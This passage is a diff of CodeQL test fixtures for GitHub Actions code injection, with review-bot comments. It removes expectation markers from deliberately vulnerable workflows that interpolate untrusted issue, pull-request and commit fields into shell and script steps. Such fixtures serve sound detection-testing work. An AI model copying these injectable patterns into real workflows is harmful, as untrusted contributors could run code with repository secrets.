a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml index fc56cbc51211..b964bb78dac3 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files # $ Source[actions/code-injection/medium] + - name: Remove foo from changed files id: step uses: mad9000/actions-find-and-replace-string@3 with: 
@@ -41,4 +41,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml index d075aecd67e7..d6b7b2b1b0c5 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml @@ -42,4 +42,4 @@ jobs: steps: - id: sink # Should not be reported since job1 is not needed - run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml index 348fe03ec72a..5e767ce0239f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml 
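Review bot: In `inter-job5.yml` the context comment `# Should not be reported since job1 is not needed` now stands alone, but the `run: echo ${{needs.job1.outputs.job_output}}` line under it carried `# $ Alert[actions/code-injection/medium]` before this change, so the query apparently does report it. Dropping the marker hides what looks like a known false positive. If the result is still produced, record that in the fixture: `# $ SPURIOUS: Alert[actions/code-injection/medium]` where inline expectations stay in use, or a plain `# currently reported (false positive)` comment otherwise. The `steps:` list this line belongs to starts outside the hunk.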
@@ -1,20 +1,20 @@ on: issues env: - global_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] + global_env: ${{ github.event.issue.title }} test: test jobs: echo-chamber: env: - job_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] + job_env: ${{ github.event.issue.title }} runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.issue.title }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.issue.body }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ env.global_env }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.issue.title }}' + - run: echo '${{ github.event.issue.body }}' + - run: echo '${{ env.global_env }}' - run: echo '${{ env.test }}' - - run: echo '${{ env.job_env }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ env.step_env }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ env.job_env }}' + - run: echo '${{ env.step_env }}' env: - step_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] + step_env: ${{ github.event.issue.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml index bfb4c4888624..b17a1fecbeb4 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest if: ${{ github.event.comment.body == '/jira ticket' }} steps: - - run: echo ${{ github.event.comment.body }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ github.event.comment.body }} - name: Login uses: atlassian/gajira-login@v3 
@@ -20,7 +20,7 @@ jobs: JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }} - name: SearchParam - run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' # $ Alert[actions/code-injection/critical] + run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' - name: Search id: search diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml index ad5d52fcb6bc..ad9187a3d6bf 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml @@ -41,7 +41,7 @@ jobs: run: | echo "Checking issue body for profanities..." PROFANITIES_LIST="bad|disguting|horrible" - if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then # $ Alert[actions/code-injection/critical] + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then echo "Profanity detected in issue body. Please clean up the language." exit 1 else @@ -66,7 +66,7 @@ jobs: uses: actions/github-script@v5 with: script: | - const commentBody = "${{ github.event.comment.body }}"; # $ Alert[actions/code-injection/critical] + const commentBody = "${{ github.event.comment.body }}"; let response; if (commentBody.includes("hello")) { response = "Hello! How can I help you today?"; diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml index bd378f614064..826051dfc5ac 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml 
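Review bot: In `json_wrap.yml`, the `SearchParam` step `run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}'` was the only fixture line documenting that wrapping a tainted value in `toJSON(...)` does not stop it being flagged. In `gollum.yml` the `toJSON(github.event.pages.*.title)` line keeps its `# safe` comment, so after this change the two cases read as if they were treated alike. A short comment on the `SearchParam` line would keep the intent visible, for example `# toJSON is not treated as a sanitizer here; expected to be flagged (critical)`. The severity in that comment comes from the removed marker and should be checked against the `.expected` output.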
@@ -34,4 +34,4 @@ jobs: pr-message: 'Message that will be displayed on users first pr' - name: Log test executions run: | - echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." # $ Alert[actions/code-injection/critical] + echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml index 3ab37e1e4dba..560e69f9e4b0 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml @@ -11,4 +11,4 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.pull_request.body }}" # $ Alert[actions/code-injection/medium] + - run: echo "${{ github.event.pull_request.body }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml index 01af6deeaf20..d4ce78856694 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml 
@@ -4,11 +4,11 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.review.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.event.review.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml index 1b08e4a18550..5d288caad85d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml 
@@ -4,11 +4,11 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.comment.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.event.comment.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml index da99a837568e..4ca3753f50cd 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml 
@@ -6,12 +6,12 @@ jobs: steps: - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, so we should not report it - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, so we should not report it - - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.head_ref }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.head_ref }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml index 97dfeb05c81b..2006a7999daf 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml 
@@ -4,13 +4,13 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.commits[11].message }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].author.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].author.name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.message }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.author.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.author.name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.committer.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.committer.name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].committer.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].committer.name }}' # $ Alert[actions/code-injection/medium] \ No newline at end of file + - run: echo '${{ github.event.commits[11].message }}' + - run: echo '${{ github.event.commits[11].author.email }}' + - run: echo '${{ github.event.commits[11].author.name }}' + - run: echo '${{ github.event.head_commit.message }}' + - run: echo '${{ github.event.head_commit.author.email }}' + - run: echo '${{ github.event.head_commit.author.name }}' + - run: echo '${{ github.event.head_commit.committer.email }}' + - run: echo '${{ github.event.head_commit.committer.name }}' + - run: echo '${{ github.event.commits[11].committer.email }}' + - run: echo '${{ github.event.commits[11].committer.name }}' \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml index f459b9b51499..8b7a6df009c2 100644 
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml @@ -6,13 +6,13 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.commits[11].message }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].author.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].author.name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.message }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.author.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.author.name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.committer.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.head_commit.committer.name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].committer.email }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.commits[11].committer.name }}' # $ Alert[actions/code-injection/medium] \ No newline at end of file + - run: echo '${{ github.event.commits[11].message }}' + - run: echo '${{ github.event.commits[11].author.email }}' + - run: echo '${{ github.event.commits[11].author.name }}' + - run: echo '${{ github.event.head_commit.message }}' + - run: echo '${{ github.event.head_commit.author.email }}' + - run: echo '${{ github.event.head_commit.author.name }}' + - run: echo '${{ github.event.head_commit.committer.email }}' + - run: echo '${{ github.event.head_commit.committer.name }}' + - run: echo '${{ github.event.commits[11].committer.email }}' + - run: echo '${{ github.event.commits[11].committer.name }}' \ No newline at end of file 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml index 34c2f156a099..0c4aa93c7a58 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/medium] + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/medium] - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/medium] + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' with: result-encoding: string script: | @@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; # $ Alert[actions/code-injection/medium] + const log = '${{ env.log }}'; let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { 
@@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/medium] + const prevLog = '${{ env.prev_log }}'; const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml index 333af0376ca0..0c4aa93c7a58 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' with: result-encoding: string script: | 
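Review bot: After this change `reusable-workflow-1.yml`, `reusable-workflow-2.yml` and the external `TestOrg/TestRepo` copy all resolve to the same blob (`0c4aa93c7a58` in their three `index` lines). The removed markers were the only in-file record that the first is expected at `medium` and the other two at `critical`. That difference seems to come from the caller: `reusable-workflow-caller-1.yml` shows `permissions: {}` in its hunk context. A reader of the fixtures can no longer see why identical files produce different severities. A one-line header in each file would restore that, e.g. `# called from reusable-workflow-caller-1.yml (permissions: {}); expected severity: medium`. As a side effect the files would no longer be byte-identical, which makes an accidental swap easier to spot.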
@@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; # $ Alert[actions/code-injection/critical] + const log = '${{ env.log }}'; let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { @@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/critical] + const prevLog = '${{ env.prev_log }}'; const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml index 3ef3f09bf563..a237856b6ce7 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -8,4 +8,4 @@ jobs: permissions: {} uses: ./.github/workflows/reusable-workflow-1.yml with: - taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/medium] + taint: ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml index e4c6ec031442..0f87d1e9394f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml 
@@ -7,4 +7,4 @@ jobs: test: uses: ./.github/workflows/reusable-workflow-2.yml with: - taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] + taint: ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml index 4ef27dca557e..39dfafcf023e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml @@ -7,4 +7,4 @@ jobs: test: uses: TestOrg/TestRepo/.github/workflows/reusable-workflow.yml@main with: - taint: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] + taint: ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml index 087b116464e5..5390612f105d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml @@ -13,8 +13,8 @@ jobs: - id: source uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['comment']['body'] }} # $ Source[actions/code-injection/critical] + source: ${{ github.event['comment']['body'] }} find: 'foo' replace: '' - - run: ${{ steps.source.outputs.value }} # $ Alert[actions/code-injection/critical] - - run: ${{ needs.test1.outputs.job_output }} # $ Alert[actions/code-injection/critical] + - run: ${{ steps.source.outputs.value }} + - run: ${{ needs.test1.outputs.job_output }} 
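Review bot: The `taint: ${{ github.event.pull_request.title }}` line is now identical in reusable-workflow-caller-1.yml, reusable-workflow-caller-2.yml and reusable-workflow-caller-3.yml, yet the removed markers classified it as `actions/code-injection/medium` in caller-1 and `actions/code-injection/critical` in the other two. The same split applies to the `const prevLog = '${{ env.prev_log }}';` sink in the reusable-workflow-1.yml and reusable-workflow-2.yml hunks. Whatever separates the two severities (presumably the workflow trigger) lies outside these hunks, so the fixtures no longer record which query each one is meant to exercise. A plain trailing comment would keep that visible without changing line numbers, e.g. `taint: ${{ github.event.pull_request.title }} # tainted input, expected by actions/code-injection/critical`.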
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml index 78f5c845d04d..94e8be89bdc6 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml @@ -8,12 +8,12 @@ jobs: - id: summary uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event.head_commit.message }} # $ Source[actions/code-injection/medium] + source: ${{ github.event.head_commit.message }} find: 'foo' replace: '' - id: flow run: | - echo "${{steps.summary.outputs.value}}" # $ Alert[actions/code-injection/medium] + echo "${{steps.summary.outputs.value}}" - id: no-flow run: | echo "${{steps.summary.outputs.foo}}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml index d1c7dedaa10e..8271f93d857f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml @@ -15,7 +15,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files # $ Source[actions/code-injection/critical] + - name: Remove foo from changed files id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -26,7 +26,7 @@ jobs: - name: List all changed files id: sink run: | - for file in ${{ steps.step.outputs.value }}; do # $ Alert[actions/code-injection/critical] + for file in ${{ steps.step.outputs.value }}; do echo "$file was changed" done diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml index e08ab1a84556..3128aacc93ce 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml 
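Review bot: In simple1.yml the `flow` step (`echo "${{steps.summary.outputs.value}}"`) and the `no-flow` step (`echo "${{steps.summary.outputs.foo}}"`) become indistinguishable once the `# $ Source[...]` and `# $ Alert[actions/code-injection/medium]` markers are dropped, although only the first was marked as an expected result. The same happens where flagged and unflagged interpolations sit side by side in the test2.yml, test10.yml and test20.yml hunks. If the inline markers have to go, a plain comment on the negative case, such as `# negative case: no alert expected for outputs.foo`, would keep the fixture's intent readable. Whether the matching `.expected` file still pins these locations cannot be seen from this hunk, so that is worth confirming before merging.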
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -17,7 +17,7 @@ jobs: steps: - name: Echo trigger run: | - echo "head branch: ${{ github.event.workflow_run.head_branch }}" # $ Alert[actions/code-injection/critical] + echo "head branch: ${{ github.event.workflow_run.head_branch }}" cat << EOF - ${{ toJSON(github.event) }} # $ Alert[actions/code-injection/critical] + ${{ toJSON(github.event) }} EOF diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml index 1eb2797e31bc..5422ac4e9876 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml @@ -17,5 +17,5 @@ jobs: repo-token: ${{ env.GH_TOKEN }} permission-level: read - - run: echo "${{ steps.command.outputs.command-arguments }}" # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] + - run: echo "${{ steps.command.outputs.command-arguments }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 6d29df909559..5aeb9aac7c52 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -17,7 +17,7 @@ jobs: - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event['pull_request']['body'] }} # $ Source[actions/code-injection/critical] + source: ${{ github.event['pull_request']['body'] }} find: 'foo' replace: '' - id: step1 @@ -49,4 +49,4 @@ jobs: needs: job1 steps: - - run: echo ${{needs.job1.outputs['job_output']}} # $ Alert[actions/code-injection/critical] + - run: echo ${{needs.job1.outputs['job_output']}} 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml index b58a9cb0aa26..d149df2bd7ca 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -20,10 +20,10 @@ jobs: - name: Extract Jira Key env: - TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/code-injection/critical] + TITLE: ${{ github.event.pull_request.title }} run: echo ISSUE_KEY=$(echo "$TITLE") >> $GITHUB_ENV - name: Sink - run: echo ${{ env.ISSUE_KEY }} # $ Alert[actions/code-injection/critical] + run: echo ${{ env.ISSUE_KEY }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml index 9cbfa20a6a27..2e734076cb71 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml @@ -54,7 +54,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo $CI_BRANCH_PUSH @@ -144,7 +144,7 @@ jobs: run: | CI_BRANCH_PUSH=${{ github.event.ref }} CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} - CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} # $ Alert[actions/code-injection/medium] + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} CI_SHA_PUSH=${{ github.event.head_commit.id }} CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} echo 